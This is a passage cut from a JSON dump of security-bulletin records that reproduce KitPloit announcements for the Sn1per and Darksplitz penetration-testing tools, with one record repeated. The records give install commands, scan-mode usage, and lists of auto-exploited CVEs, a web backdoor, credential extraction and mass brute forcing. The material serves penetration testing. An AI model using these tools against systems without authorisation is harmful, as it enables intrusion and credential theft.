Services unserialize() SA-CORE-2019-003\n * Apache Struts: S2-057 (CVE-2018-11776): Security updates available for Apache Struts\n * Drupal: CVE-2018-7600: [Remote Code Execution](<https://www.kitploit.com/search/label/Remote%20Code%20Execution> \"Remote Code Execution\" ) \\- SA-CORE-2018-002\n * GPON Routers - Authentication Bypass / [Command Injection](<https://www.kitploit.com/search/label/Command%20Injection> \"Command Injection\" ) CVE-2018-10561\n * MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption\n * Apache Tomcat: Remote Code Execution (CVE-2017-12617)\n * Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution CVE-2017-10271\n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638)\n * Apache Struts 2 Framework Checks - REST plugin with XStream handler (CVE-2017-9805)\n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638)\n * Microsoft IIS WebDav ScStoragePathFromUrl Overflow CVE-2017-7269\n * ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability CVE-2015-8249\n * Shellshock Bash Shell remote code execution CVE-2014-6271\n * HeartBleed OpenSSL Detection CVE-2014-0160\n * MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387)\n * Tomcat Application Manager Default Ovwebusr Password Vulnerability CVE-2009-3843\n * MS08-067 Microsoft Server Service Relative Path Stack Corruption\n * Webmin File Disclosure CVE-2006-3392\n * VsFTPd 2.3.4 Backdoor\n * ProFTPd 1.3.3C Backdoor\n * MS03-026 Microsoft RPC DCOM Interface Overflow\n * DistCC Daemon Command Execution\n * JBoss Java De-Serialization\n * HTTP Writable Path PUT/DELETE File Access\n * Apache Tomcat User Enumeration\n * Tomcat Application Manager Login Bruteforce\n * Jenkins-CI Enumeration\n * HTTP WebDAV Scanner\n * Android Insecure ADB\n * Anonymous FTP Access\n * PHPMyAdmin Backdoor\n * PHPMyAdmin Auth Bypass\n * OpenSSH User Enumeration\n * LibSSH Auth Bypass\n * SMTP User 
Enumeration\n * Public NFS Mounts\n \n**KALI LINUX INSTALL:** \n\n \n \n bash install.sh\n\n \n**UBUNTU/DEBIAN/PARROT INSTALL:** \n\n \n \n bash install_debian_ubuntu.sh\n\n \n**DOCKER INSTALL:** \n\n \n \n docker build Dockerfile\n\n \n**USAGE:** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON + FULL PORT SCAN + BRUTE FORCE\n sniper -t|--target <TARGET> -o|--osint -re|--recon -fp|--fullportonly -b|--bruteforce\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] FLYOVER MODE\n sniper -t|--target <TARGET> -m|--mode flyover -w|--workspace <WORKSPACE_ALIAS>\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TA RGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT HTTP MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT HTTPS MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] WEBSCAN MODE\n sniper -t|--target <TARGET> -m|--mode webscan\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] LOOT REIMPORTALL FUNCTION\n sniper -w 
<WORKSPACE_ALIAS> --reimportall\n \n [*] DELETE WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -d\n \n [*] DELETE HOST FROM WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -t <TARGET> -dh\n \n [*] SCHEDULED SCANS'\n sniper -w <WORKSPACE_ALIAS> -s daily|weekly|monthly'\n \n [*] SCAN STATUS\n sniper --status\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n**MODES:** \n\n\n * **NORMAL:** Performs a basic scan of targets and open ports using both active and passive checks for optimal performance.\n * **STEALTH:** Quickly enumerates single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.\n * **FLYOVER:** Fast multi-threaded high level scans of multiple targets (useful for collecting high level data on many hosts quickly).\n * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.\n * **NUKE:** Launches a full audit of multiple hosts specified in a text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.\n * **DISCOVER:** Parses all hosts on a subnet/CIDR (i.e. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.\n * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.\n * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.\n * **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). 
Ideal for web applications but may increase scan time significantly.\n * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.\n * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.\n * **WEBSCAN:** Launches a full HTTP & HTTPS web application scan against the target via Burp Suite and Arachni.\n \n**SAMPLE REPORT:** \n<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \n \n \n\n\n**[Download Sn1per](<https://github.com/1N3/Sn1per> \"Download Sn1per\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-05-12T13:09:00", "type": "kitploit", "title": "Sn1per v7.0 - Automated Pentest Framework For Offensive Security Experts", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2014-0160", "CVE-2014-6271", "CVE-2015-8249", "CVE-2017-10271", "CVE-2017-12617", "CVE-2017-5638", "CVE-2017-7269", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-11776", "CVE-2018-7600"], "modified": "2019-05-12T13:09:05", "id": "KITPLOIT:7013881512724945934", "href": 
"http://www.kitploit.com/2019/05/sn1per-v70-automated-pentest-framework.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-04T12:36:55", "description": "[](<https://2.bp.blogspot.com/-WrSl3k8acz8/XKK-mOdvWPI/AAAAAAAAOaA/AhYa9ilCzBkxcfAhNbVH3l5YsgRSvL6tgCLcBGAs/s1600/Darksplitz.png>)\n\n \nThis tool is a continuation of the Nefix, DirsPy and Xmasspy projects. \n \n**Installation** \nIt works on [Debian](<https://www.kitploit.com/search/label/Debian> \"debian\" )-based operating systems such as BackBox, Ubuntu or Kali Linux. \n\n\n 1. `$ git clone https://github.com/koboi137/darksplitz`\n 2. `$ cd darksplitz/`\n 3. `$ sudo ./install.sh`\n \n**Features** \n\n\n * Extract [mikrotik](<https://www.kitploit.com/search/label/MikroTik> \"mikrotik\" ) credentials (user.dat)\n * Password generator\n * Reverse IP lookup\n * MAC address sniffer\n * Online MD5 cracker\n * MAC address lookup\n * Collect URLs from web.archive.org\n * Web [backdoor](<https://www.kitploit.com/search/label/Backdoor> \"backdoor\" ) (Dark Shell)\n * Winbox exploit (CVE-2018-14847)\n * ChimayRed exploit for mipsbe (Mikrotik)\n * Web application exploits\n * Mass Apple DoS (CVE-2018-4407)\n * libssh exploit (CVE-2018-10933)\n * Discover Mikrotik devices\n * Directory scanner\n * Subdomain scanner\n * MAC address scanner\n * MAC address pinger\n * Vhost [scanner](<https://www.kitploit.com/search/label/Scanner> \"scanner\" ) (bypass Cloudflare)\n * Mass [bruteforce](<https://www.kitploit.com/search/label/Bruteforce> \"bruteforce\" ) (WordPress)\n * Interactive msfrpc client\n \n**Web application exploits** \n\n\n * plUpload file upload\n * jQuery file upload (CVE-2018-9206)\n * Laravel (.env)\n * sftp-config.json (misc)\n * WordPress registration (enabled)\n * elFinder file upload\n * Drupal 7 exploit (CVE-2018-7600)\n * Drupal 8 exploit (CVE-2018-7600)\n * com_fabrik exploit (Joomla)\n * gravityform plugin file upload (WordPress)\n * geoplace3 plugin file upload 
(WordPress)\n * peugeot-music plugin file upload (WordPress)\n \n**Notes** \nThis tool works best as root, because the scapy module and some other components need root privileges for their full feature set; a number of features also run as an unprivileged user. \n \n \n\n\n**[Download Darksplitz](<https://github.com/koboi137/darksplitz> \"Download Darksplitz\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-04T21:12:00", "type": "kitploit", "title": "Darksplitz - Exploit Framework", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10933", "CVE-2018-14847", "CVE-2018-4407", "CVE-2018-7600", "CVE-2018-9206"], "modified": "2019-04-04T21:12:09", "id": "KITPLOIT:5494076556436489947", "href": "http://www.kitploit.com/2019/04/darksplitz-exploit-framework.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T15:18:18", "description": "[](<https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [automated 
scanner](<https://www.kitploit.com/search/label/Automated%20scanner>) that can be used during a [penetration test](<https://www.kitploit.com/search/label/Penetration%20Test>) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting add-on for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.\n\n \n**SN1PER PROFESSIONAL FEATURES:** \n \n**Professional reporting interface** \n \n\n\n[](<https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s1600/Sn1per_8.png>)\n\n \n**Slideshow for all gathered screenshots** \n \n\n\n[](<https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s1600/Sn1per_9.png>)\n\n \n**Searchable and sortable DNS, IP and open port database** \n \n\n\n[](<https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s1600/Sn1per_10.png>)\n\n \n \n**Categorized host reports** \n \n\n\n[](<https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png>)\n\n \n \n**Quick links to online recon tools and Google hacking queries** \n \n\n\n[](<https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s1600/Sn1per_12.png>)\n\n \n**Personalized notes field for each host** \n \n\n\n[](<https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s1600/Sn1per_13.png>)\n\n \n \n**DEMO VIDEO:** \n[](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>) \n \n**SN1PER COMMUNITY FEATURES:** \n\n\n * Automatically collects basic recon (i.e. 
whois, ping, DNS, etc.)\n * Automatically launches Google hacking queries against a target domain\n * Automatically enumerates open ports via Nmap port scanning\n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers\n * Automatically checks for sub-domain hijacking\n * Automatically runs targeted Nmap scripts against open ports\n * Automatically runs targeted Metasploit scan and exploit modules\n * Automatically scans all web applications for common vulnerabilities\n * Automatically brute forces ALL open services\n * Automatically tests for anonymous FTP access\n * Automatically runs WPScan, Arachni and Nikto for all web services\n * Automatically enumerates NFS shares\n * Automatically tests for anonymous LDAP access\n * Automatically enumerates SSL/TLS ciphers, protocols and vulnerabilities\n * Automatically enumerates SNMP community strings, services and users\n * Automatically lists SMB users and shares, checks for NULL sessions and exploits MS08-067\n * Automatically exploits vulnerable JBoss, Java RMI and Tomcat servers\n * Automatically tests for open X11 servers\n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds\n * Performs high-level enumeration of multiple hosts and subnets\n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting\n * Automatically gathers screenshots of all web sites\n * Creates individual workspaces to store all scan output\n \n**AUTO-PWN:** \n\n\n * Drupal Drupalgeddon2 RCE CVE-2018-7600\n * GPON Router RCE CVE-2018-10561\n * [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 RCE CVE-2017-5638\n * Apache Struts 2 RCE CVE-2017-9805\n * Apache Jakarta RCE CVE-2017-5638\n * Shellshock GNU Bash RCE CVE-2014-6271\n * Heartbleed OpenSSL Detection CVE-2014-0160\n * Default Apache Tomcat Creds CVE-2009-3843\n * MS Windows SMB RCE MS08-067\n * Webmin File Disclosure CVE-2006-3392\n * [Anonymous 
FTP](<https://www.kitploit.com/search/label/Anonymous%20FTP>) Access\n * PHPMyAdmin Backdoor RCE\n * PHPMyAdmin Auth Bypass\n * JBoss Java De-Serialization RCEs\n \n**KALI LINUX INSTALL:** \n\n \n \n ./install.sh\n\n \n**DOCKER INSTALL:** \nCredits: @menzow \nDocker Install: <https://github.com/menzow/sn1per-docker> \nDocker Build: <https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/> \nExample usage: \n\n \n \n $ docker pull menzo/sn1per-docker\n $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io\n\n \n**USAGE:** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON\n sniper -t|--target <TARGET> -o|--osint -re|--recon\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORKSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f|--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] 
UPDATE SNIPER\n sniper -u|--update\n\n \n**MODES:** \n\n\n * **NORMAL:** Performs a basic scan of targets and open ports using both active and passive checks for optimal performance.\n * **STEALTH:** Quickly enumerates single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.\n * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full path of the file that contains all hosts/IPs to be scanned, e.g. sniper -f /full/path/to/targets.txt -m airstrike.\n * **NUKE:** Launches a full audit of multiple hosts specified in a text file of your choice. Usage example: sniper -f /pentest/loot/targets.txt -m nuke.\n * **DISCOVER:** Parses all hosts on a subnet/CIDR (e.g. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.\n * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.\n * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.\n * **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). 
Ideal for web applications but may increase scan time significantly.\n * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.\n * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.\n * **UPDATE:** Checks for updates and upgrades all components used by sniper.\n * **REIMPORT:** Reimport all workspace files into Metasploit and reproduce all reports.\n * **RELOAD:** Reload the master workspace report.\n \n**SAMPLE REPORT:** \n<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \n \n \n\n\n**[Download Sn1per v5.0](<https://github.com/1N3/Sn1per>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-07-05T13:45:00", "type": "kitploit", "title": "Sn1per v5.0 - Automated Pentest Recon Scanner", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2014-0160", "CVE-2014-6271", "CVE-2017-5638", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-7600"], "modified": "2018-07-05T13:45:01", "id": "KITPLOIT:7835941952769002973", "href": "http://www.kitploit.com/2018/07/sn1per-v50-automated-pentest-recon.html", "cvss": 
{"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T15:17:53", "description": "[](<https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [automated scanner](<https://www.kitploit.com/search/label/Automated%20scanner>) that can be used during a [penetration test](<https://www.kitploit.com/search/label/Penetration%20Test>) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.\n\n \n**SN1PER PROFESSIONAL FEATURES:** \n \n**Professional reporting interface** \n \n\n\n[](<https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s1600/Sn1per_8.png>)\n\n \n**Slideshow for all gathered screenshots** \n \n\n\n[](<https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s1600/Sn1per_9.png>)\n\n \n**Searchable and sortable DNS, IP and open port database** \n \n\n\n[](<https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s1600/Sn1per_10.png>)\n\n \n \n**Categorized host reports** \n \n\n\n[](<https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png>)\n\n \n \n**Quick links to online recon tools and Google hacking queries** \n \n\n\n[](<https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s1600/Sn1per_12.png>)\n\n \n**Personalized notes field for each host** \n \n\n\n[](<https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s1600/Sn1per_13.png>)\n\n \n \n**DEMO VIDEO:** \n[](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>) \n 
\n**SN1PER COMMUNITY FEATURES:** \n\n\n * Automatically collects basic recon (i.e. whois, ping, DNS, etc.)\n * Automatically launches Google hacking queries against a target domain\n * Automatically enumerates open ports via Nmap port scanning\n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers\n * Automatically checks for sub-domain hijacking\n * Automatically runs targeted Nmap scripts against open ports\n * Automatically runs targeted Metasploit scan and exploit modules\n * Automatically scans all web applications for common vulnerabilities\n * Automatically brute forces ALL open services\n * Automatically tests for anonymous FTP access\n * Automatically runs WPScan, Arachni and Nikto for all web services\n * Automatically enumerates NFS shares\n * Automatically tests for anonymous LDAP access\n * Automatically enumerates SSL/TLS ciphers, protocols and vulnerabilities\n * Automatically enumerates SNMP community strings, services and users\n * Automatically lists SMB users and shares, checks for NULL sessions and exploits MS08-067\n * Automatically exploits vulnerable JBoss, Java RMI and Tomcat servers\n * Automatically tests for open X11 servers\n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds\n * Performs high-level enumeration of multiple hosts and subnets\n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting\n * Automatically gathers screenshots of all web sites\n * Creates individual workspaces to store all scan output\n \n**AUTO-PWN:** \n\n\n * Drupal Drupalgeddon2 RCE CVE-2018-7600\n * GPON Router RCE CVE-2018-10561\n * [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 RCE CVE-2017-5638\n * Apache Struts 2 RCE CVE-2017-9805\n * Apache Jakarta RCE CVE-2017-5638\n * Shellshock GNU Bash RCE CVE-2014-6271\n * Heartbleed OpenSSL Detection CVE-2014-0160\n * Default Apache Tomcat Creds CVE-2009-3843\n * MS Windows SMB RCE MS08-067\n * Webmin 
File Disclosure CVE-2006-3392\n * [Anonymous FTP](<https://www.kitploit.com/search/label/Anonymous%20FTP>) Access\n * PHPMyAdmin Backdoor RCE\n * PHPMyAdmin Auth Bypass\n * JBoss Java De-Serialization RCEs\n \n**KALI LINUX INSTALL:** \n\n \n \n ./install.sh\n\n \n**DOCKER INSTALL:** \nCredits: @menzow \nDocker Install: <https://github.com/menzow/sn1per-docker> \nDocker Build: <https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/> \nExample usage: \n\n \n \n $ docker pull menzo/sn1per-docker\n $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io\n\n \n**USAGE:** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON\n sniper -t|--target <TARGET> -o|--osint -re|--recon\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORKSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f|--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n 
sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n**MODES:** \n\n\n * **NORMAL:** Performs a basic scan of targets and open ports using both active and passive checks for optimal performance.\n * **STEALTH:** Quickly enumerates single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.\n * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full path of the file that contains all hosts/IPs to be scanned, e.g. sniper -f /full/path/to/targets.txt -m airstrike.\n * **NUKE:** Launches a full audit of multiple hosts specified in a text file of your choice. Usage example: sniper -f /pentest/loot/targets.txt -m nuke.\n * **DISCOVER:** Parses all hosts on a subnet/CIDR (e.g. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.\n * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.\n * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.\n * **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). 
Ideal for web applications but may increase scan time significantly.\n * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.\n * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.\n * **UPDATE:** Checks for updates and upgrades all components used by sniper.\n * **REIMPORT:** Reimport all workspace files into Metasploit and reproduce all reports.\n * **RELOAD:** Reload the master workspace report.\n \n**SAMPLE REPORT:** \n<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \n \n \n\n\n**[Download Sn1per v5.0](<https://github.com/1N3/Sn1per>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, 